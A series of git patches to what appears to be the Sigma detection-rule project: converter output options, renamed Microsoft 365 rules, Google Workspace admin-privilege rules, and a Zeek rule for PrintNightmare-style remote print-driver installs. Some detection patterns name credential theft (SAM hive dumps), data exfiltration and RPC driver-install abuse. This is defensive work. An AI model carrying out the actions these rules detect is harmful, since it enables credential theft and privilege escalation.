translates AST into OpenSearch boolean queries. ''' def build_query(self, translation): - # print(f'\nparsed translation: {translation.strip("()").split("OR")}\n') - translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" - # translation = '(winlog.event_id:"5156" AND (winlog.event_data.SourcePort:"3389" AND winlog.event_data.DestAddress.keyword:(127.* OR \:\:1)))' - ast = parse_group(translation) - print("\nAST: " + str(ast) + "\n") - return translate_group(ast) + translatedQuery = translate_group(ast) + + if self.isThreshold: + translatedQuery["bool"]["filter"] = self.rule_threshold + + return translatedQuery ''' Builds inputs field of OS monitor. @@ -565,8 +569,6 @@ class OpenSearchQsBackend(OpenSearchBackend, ElasticsearchQuerystringBackend): def generateAggregation(self, agg): if agg.aggfunc == SigmaAggregationParser.AGGFUNC_COUNT: - if agg.cond_op not in [">", ">="]: - raise NotImplementedError("Threshold rules can only handle > and >= operators") if agg.aggfield: raise NotImplementedError("Threshold rules cannot COUNT(DISTINCT %s)" % agg.aggfield) self.isThreshold = True diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 4ba2f840..350ffb86 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -18,6 +18,7 @@ import sys import argparse import yaml +import ruamel.yaml import json import pathlib import itertools @@ -53,10 +54,14 @@ ERR_RULE_FILTER_PARSING = 11 ERR_CONFIG_REQUIRED = 20 ERR_CONFIG_ORDER = 21 ERR_CONFIG_BACKEND = 22 +ERR_OUTPUT_FORMAT = 30 ERR_NOT_IMPLEMENTED = 42 ERR_PARTIAL_FIELD_MATCH = 80 ERR_FULL_FIELD_MATCH = 90 +# Allowed fields in output +allowed_fields = ["title", "id", "status", "description", "author", "references", "fields", "falsepositives", "level", "tags", "filename"] + def alliter(path): for sub in path.iterdir(): if sub.name.startswith("."): @@ -104,7 +109,12 @@ def set_argparser(): argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") - argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") + argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). + Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value. + available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. + This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) + argparser.add_argument("--output-format", "-oF", choices=["json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") + argparser.add_argument("--output-extention", "-e", default=None, help="Extension of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") @@ -213,11 +223,20 @@ def main(): print("Sigma configuration parse error in %s: %s" % (conf_name, str(e)), file=sys.stderr) exit(ERR_CONFIG_PARSING) + if cmdargs.output_fields: + if cmdargs.output_format: + output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields + if output_fields_rejected: + print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr) + exit(ERR_OUTPUT_FORMAT) + else: + output_fields_filtered = [field for field in cmdargs.output_fields.split(",") if field in allowed_fields] # Keep only allowed fields + else: + print("The '--output-fields' or '-of' arguments must be used with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr) + exit(ERR_OUTPUT_FORMAT) + backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) - print(f'backend options: {cmdargs.backend_config}') backend = backend_class(sigmaconfigs, backend_options) - print(f'sigma configs: {backend_options}') - print(f'backend: {backend}') filename_ext = cmdargs.output_extention filename = cmdargs.output @@ -243,6 +262,7 @@ def main(): out = sys.stdout error = 0 + output_array = [] for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): logger.debug("* Processing Sigma input %s" % (sigmafile)) try: @@ -251,14 +271,14 @@ def main(): else: f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) - print(f'\nparser: {parser.parsers[0].condtoken} \n {parser.parsers[0].condparsed[0]}\n') results = parser.generate(backend) - + nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - newline_separator = '\0' if cmdargs.print0 else '\n' + + results = list(results) # Since results is an iterator and used twice we convert it a list for result in results: if not fileprefix == None and not inc_filenane == None: #yml action try: @@ -277,27 +297,32 @@ def main(): except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) - print(result, file=out, end=newline_separator) - - if nb_result == 0: # elastalert return "results=[]" so get a error with out not def - if not fileprefix == None and not inc_filenane == None: #yml action + if not cmdargs.output_fields: + print(result, file=out, end=newline_separator) + + if cmdargs.output_fields: # Handle output fields + output={} + f.seek(0) + docs = yaml.load_all(f, Loader=yaml.FullLoader) + for doc in docs: + for k,v in doc.items(): + if k in output_fields_filtered: + output[k] = v + output['rule'] = [result for result in results] + if "filename" in output_fields_filtered: + output['filename'] = str(sigmafile.name) + output_array.append(output) + + if nb_result == 0: # backend get only 1 output + if not fileprefix == None: # want a prefix anyway try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) - inc_filenane += 1 - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) - elif not fileprefix == None and inc_filenane == None: # a simple yml - try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) + filename = "%s%s_mono_output%s" % (fileprefix,cmdargs.target,filename_ext) out = open(filename, "w", encoding='utf-8') + fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) - + except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) error = ERR_OPEN_SIGMA_RULE @@ -323,13 +348,12 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - # except (NotImplementedError, TypeError) as e: - # print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - # print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) - # if not cmdargs.ignore_backend_errors: - # error = ERR_NOT_IMPLEMENTED - # if not cmdargs.defer_abort: - # sys.exit(error) + except (NotImplementedError, TypeError) as e: + print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + if not cmdargs.ignore_backend_errors: + error = ERR_NOT_IMPLEMENTED + if not cmdargs.defer_abort: + sys.exit(error) except PartialMatchError as e: print("Error: Partial field match error: %s" % str(e), file=sys.stderr) if not cmdargs.ignore_backend_errors: @@ -347,10 +371,17 @@ def main(): f.close() except: pass - + result = backend.finalize() if result: print(result, file=out) + + if cmdargs.output_fields: + if cmdargs.output_format == 'json': + print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out) + elif cmdargs.output_format == 'yaml': + print(ruamel.yaml.round_trip_dump(output_array), file=out) + out.close() sys.exit(error) From c0e58d3c276ba3a9de7bc2e01af4ed554d8e5a5b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 23:00:58 +0000 Subject: [PATCH 0538/1367] Update --- ...ed_user.yml => microsoft365_activity_by_terminated_user.yml} | 2 +- ...ml => microsoft365_activity_from_anonymous_ip_addresses.yml} | 2 +- ...ry.yml => microsoft365_activity_from_infrequent_country.yml} | 2 +- ...l => microsoft365_data_exfiltration_to_unsanctioned_app.yml} | 2 +- ...resses.yml => microsoft365_from_suspicious_ip_addresses.yml} | 2 +- ...address.yml => microsoft365_logon_from_risky_ip_address.yml} | 2 +- ...warding.yml => microsoft365_suspicious_inbox_forwarding.yml} | 2 +- ...rosoft365_suspicious_oauth_app_file_download_activities.yml} | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) rename rules/cloud/m365/{m365_activity_by_terminated_user.yml => microsoft365_activity_by_terminated_user.yml} (95%) rename rules/cloud/m365/{m365_activity_from_anonymous_ip_addresses.yml => microsoft365_activity_from_anonymous_ip_addresses.yml} (94%) rename rules/cloud/m365/{m365_activity_from_infrequent_country.yml => microsoft365_activity_from_infrequent_country.yml} (95%) rename rules/cloud/m365/{m365_data_exfiltration_to_unsanctioned_app.yml => microsoft365_data_exfiltration_to_unsanctioned_app.yml} (94%) rename rules/cloud/m365/{m365_from_suspicious_ip_addresses.yml => microsoft365_from_suspicious_ip_addresses.yml} (95%) rename rules/cloud/m365/{m365_logon_from_risky_ip_address.yml => microsoft365_logon_from_risky_ip_address.yml} (95%) rename rules/cloud/m365/{m365_suspicious_inbox_forwarding.yml => microsoft365_suspicious_inbox_forwarding.yml} (95%) rename rules/cloud/m365/{m365_suspicious_oauth_app_file_download_activities.yml => microsoft365_suspicious_oauth_app_file_download_activities.yml} (93%) diff --git a/rules/cloud/m365/m365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml similarity index 95% rename from rules/cloud/m365/m365_activity_by_terminated_user.yml rename to rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 738af6e9..c24d42b6 100644 --- a/rules/cloud/m365/m365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -1,4 +1,4 @@ -title: Activity performed by terminated user +title: Activity Performed by Terminated User id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: experimental description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. diff --git a/rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml similarity index 94% rename from rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml rename to rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml index cf1cb871..7b3a7271 100644 --- a/rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Activity from anonymous IP addresses +title: Activity from Anonymous IP Addresses id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: experimental description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. diff --git a/rules/cloud/m365/m365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml similarity index 95% rename from rules/cloud/m365/m365_activity_from_infrequent_country.yml rename to rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 9c8a433f..9aa5ab39 100644 --- a/rules/cloud/m365/m365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,4 +1,4 @@ -title: Activity from infrequent country +title: Activity from Infrequent Country id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. diff --git a/rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml similarity index 94% rename from rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml rename to rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index 09256f6a..831a15ed 100644 --- a/rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -1,4 +1,4 @@ -title: Data exfiltration to unsanctioned apps +title: Data Exfiltration to Unsanctioned Apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: experimental description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. diff --git a/rules/cloud/m365/m365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml similarity index 95% rename from rules/cloud/m365/m365_from_suspicious_ip_addresses.yml rename to rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 1714b0cd..9be142d8 100644 --- a/rules/cloud/m365/m365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Activity from suspicious IP addresses +title: Activity from Suspicious IP Addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. diff --git a/rules/cloud/m365/m365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml similarity index 95% rename from rules/cloud/m365/m365_logon_from_risky_ip_address.yml rename to rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index 99950ddc..55d1b405 100644 --- a/rules/cloud/m365/m365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -1,4 +1,4 @@ -title: Logon from a risky IP address +title: Logon from a Risky IP Address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: experimental description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. diff --git a/rules/cloud/m365/m365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml similarity index 95% rename from rules/cloud/m365/m365_suspicious_inbox_forwarding.yml rename to rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 5975e8b3..513e4f1b 100644 --- a/rules/cloud/m365/m365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,4 +1,4 @@ -title: Suspicious inbox forwarding +title: Suspicious Inbox Forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. diff --git a/rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml similarity index 93% rename from rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml rename to rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 29944ff4..6dbc4be4 100644 --- a/rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,4 +1,4 @@ -title: Suspicious OAuth app file download activities +title: Suspicious OAuth App File Download Activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. From 8382bbfe09a0ee3f6e154842e393305e5b383b54 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:37:46 -0500 Subject: [PATCH 0539/1367] Create gworkspace_user_assigned_admin_role.yml --- rules/gworkspace_user_assigned_admin_role.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/gworkspace_user_assigned_admin_role.yml diff --git a/rules/gworkspace_user_assigned_admin_role.yml b/rules/gworkspace_user_assigned_admin_role.yml new file mode 100644 index 00000000..09cfcc4f --- /dev/null +++ b/rules/gworkspace_user_assigned_admin_role.yml @@ -0,0 +1,21 @@ +title: Google Workspace User Assigned Admin Role +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an admin role is assigned to a Google Workspace user. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + admin.alert.name: google.admin.AdminService.grantAdminPrivilege + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role assigned, may be modified by system administrators. From c767da91d13062c892c76040dc414f8c55ba241c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:38:01 -0500 Subject: [PATCH 0540/1367] Delete gworkspace_user_assigned_admin_role.yml --- rules/gworkspace_user_assigned_admin_role.yml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 rules/gworkspace_user_assigned_admin_role.yml diff --git a/rules/gworkspace_user_assigned_admin_role.yml b/rules/gworkspace_user_assigned_admin_role.yml deleted file mode 100644 index 09cfcc4f..00000000 --- a/rules/gworkspace_user_assigned_admin_role.yml +++ /dev/null @@ -1,21 +0,0 @@ -title: Google Workspace User Assigned Admin Role -id: 2d1b83e4-17c6-4896-a37b-29140b40a788 -description: Detects when an admin role is assigned to a Google Workspace user. -author: Austin Songer -status: experimental -date: 2021/08/23 -references: - - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 -logsource: - service: google_workspace.admin -detection: - selection: - eventService: admin.googleapis.com - admin.alert.name: google.admin.AdminService.grantAdminPrivilege - condition: selection -level: medium -tags: - - attack.persistence - - attack.t1098 -falsepositives: - - Google Workspace admin role assigned, may be modified by system administrators. From 6b1f0b83f424ba88aec537a42d322a4008b65f04 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:38:47 -0500 Subject: [PATCH 0541/1367] Create workspace_user_assigned_admin_role.yml --- .../workspace_user_assigned_admin_role.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml diff --git a/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml b/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml new file mode 100644 index 00000000..09cfcc4f --- /dev/null +++ b/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml @@ -0,0 +1,21 @@ +title: Google Workspace User Assigned Admin Role +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an admin role is assigned to a Google Workspace user. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + admin.alert.name: google.admin.AdminService.grantAdminPrivilege + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role assigned, may be modified by system administrators. From 3dd201d36f694a4e477858bf99e7a118cd3ef5f2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:38:58 -0500 Subject: [PATCH 0542/1367] Rename workspace_user_assigned_admin_role.yml to gworkspace_user_assigned_admin_role.yml --- ...ned_admin_role.yml => gworkspace_user_assigned_admin_role.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/gworkspace/{workspace_user_assigned_admin_role.yml => gworkspace_user_assigned_admin_role.yml} (100%) diff --git a/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml b/rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml similarity index 100% rename from rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml rename to rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml From ede0332f222de278d3e14ed0d099fc34cf5db0a1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:40:20 -0500 Subject: [PATCH 0543/1367] Delete microsoft365_suspicious_inbox_manipulation_rules.yml --- ...65_suspicious_inbox_manipulation_rules.yml | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml deleted file mode 100644 index 5bcdf480..00000000 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Microsoft 365 - Suspicious inbox manipulation rules -id: d2001772-f43f-4def-86d3-a9d5c47588c0 -status: experimental -description: Detects when a Microsoft Cloud App Security reported for suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. -author: Austin Songer @austinsonger -date: 2021/08/23 -references: - - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference -logsource: - category: ThreatManagement - service: m365 -detection: - selection: - eventSource: SecurityComplianceCenter - eventName: "Suspicious inbox manipulation rules" - status: success - condition: selection -falsepositives: - - Unknown -level: medium -tags: - - attack.exfiltration - - attack.t1020.001 \ No newline at end of file From 0fe2b3f5695a2ca9b1bb5d2dd0cd478555f810c0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:52:32 -0500 Subject: [PATCH 0544/1367] Update and rename gworkspace_user_assigned_admin_role.yml to gworkspace_user_granted_admin_privileges.yml --- ....yml => gworkspace_user_granted_admin_privileges.yml} | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) rename rules/cloud/gworkspace/{gworkspace_user_assigned_admin_role.yml => gworkspace_user_granted_admin_privileges.yml} (51%) diff --git a/rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml similarity index 51% rename from rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml rename to rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml index 09cfcc4f..39d05f14 100644 --- a/rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml +++ b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -1,21 +1,22 @@ -title: Google Workspace User Assigned Admin Role +title: Google Workspace User Granted Admin Privileges id: 2d1b83e4-17c6-4896-a37b-29140b40a788 -description: Detects when an admin role is assigned to a Google Workspace user. +description: Detects when an Google Workspace user is granted admin privileges. author: Austin Songer status: experimental date: 2021/08/23 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE logsource: service: google_workspace.admin detection: selection: eventService: admin.googleapis.com - admin.alert.name: google.admin.AdminService.grantAdminPrivilege + eventName: GRANT_ADMIN_PRIVILEGE condition: selection level: medium tags: - attack.persistence - attack.t1098 falsepositives: - - Google Workspace admin role assigned, may be modified by system administrators. + - Google Workspace admin role privileges, may be modified by system administrators. From aa7a8a3e71446183c861fb0bab850fb3555aafc5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:58:20 -0500 Subject: [PATCH 0545/1367] Update gworkspace_user_granted_admin_privileges.yml --- .../gworkspace/gworkspace_user_granted_admin_privileges.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml index 39d05f14..c0b1f470 100644 --- a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml +++ b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -12,7 +12,9 @@ logsource: detection: selection: eventService: admin.googleapis.com - eventName: GRANT_ADMIN_PRIVILEGE + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE condition: selection level: medium tags: From 3cd43bfd9b04f18fb84620a853f74351e62700a3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 21:19:44 -0500 Subject: [PATCH 0546/1367] Create gworkspace_granted_domain_api_access.yml --- .../gworkspace_granted_domain_api_access.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml new file mode 100644 index 00000000..8857a874 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -0,0 +1,23 @@ +title: Google Workspace Granted Domain API Access +id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba +description: Detects when an API access service account is granted domain authority. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#AUTHORIZE_API_CLIENT_ACCESS +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: AUTHORIZE_API_CLIENT_ACCESS + condition: selection +level: medium +tags: + - attack.persistence + - atack.t1098 +falsepositives: + - Unknown + From facd58bd0ad5972bb8c723075b38b01f2a0e8b67 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 21:19:51 -0500 Subject: [PATCH 0547/1367] Delete gworkspace_user_granted_admin_privileges.yml --- ...orkspace_user_granted_admin_privileges.yml | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml diff --git a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml deleted file mode 100644 index c0b1f470..00000000 --- a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Google Workspace User Granted Admin Privileges -id: 2d1b83e4-17c6-4896-a37b-29140b40a788 -description: Detects when an Google Workspace user is granted admin privileges. -author: Austin Songer -status: experimental -date: 2021/08/23 -references: - - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE -logsource: - service: google_workspace.admin -detection: - selection: - eventService: admin.googleapis.com - eventName: - - GRANT_DELEGATED_ADMIN_PRIVILEGES - - GRANT_ADMIN_PRIVILEGE - condition: selection -level: medium -tags: - - attack.persistence - - attack.t1098 -falsepositives: - - Google Workspace admin role privileges, may be modified by system administrators. From 9e588fdcf68ba9fc485e03bcf4a7fd10e8d81b75 Mon Sep 17 00:00:00 2001 From: neu5ron Date: Tue, 24 Aug 2021 00:58:36 -0400 Subject: [PATCH 0548/1367] Zeek dce_rpc.log Detection of print driver installs over RPC (ie: possible PrintNightmare) using the three existing known RPC functions, as well as few others "discussed" but not directly related to PrintNightmare PoC or public post-compromise write-ups. --- ...pc_printnightmare_print_driver_install.yml | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml new file mode 100644 index 00000000..390edb4d --- /dev/null +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -0,0 +1,45 @@ +title: Possible PrintNightmare Print Driver Install +id: 7b33baef-2a75-4ca3-9da4-34f9a15382d8 +description: | + Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). + The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. +author: '@neu5ron (Nate Guagenti)' +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29 + - https://github.com/zeek/zeek/blob/master/scripts/base/protocols/dce-rpc/consts.zeek + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 + - https://github.com/corelight/CVE-2021-1675 + - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml + - https://old.zeek.org/zeekweek2019/slides/bzar.pdf + - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ + - +tags: + - attack.execution + - cve.2021-1675 + - cve.2021-1678 +logsource: + product: zeek + service: dce_rpc +detection: + printer_operation: + operation: + - "RpcAsyncInstallPrinterDriverFromPackage" # "76f03f96-cdfd-44fc-a22c-64950a001209",0x3e + - "RpcAsyncAddPrintProcessor" # "76f03f96-cdfd-44fc-a22c-64950a001209",0x2c + - "RpcAddPrintProcessor" # "12345678-1234-abcd-ef00-0123456789ab",0x0e + - "RpcAddPrinterDriverEx" # "12345678-1234-abcd-ef00-0123456789ab",0x59 + - "RpcAddPrinterDriver" # "12345678-1234-abcd-ef00-0123456789ab",0x09 + - "RpcAsyncAddPrinterDriver" # "76f03f96-cdfd-44fc-a22c-64950a001209",0x27 + condition: printer_operation +falsepositives: + - Legitimate remote alteration of a printer driver. +level: medium +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - operation + - endpoint + - named_pipe + - uid +status: stable \ No newline at end of file From 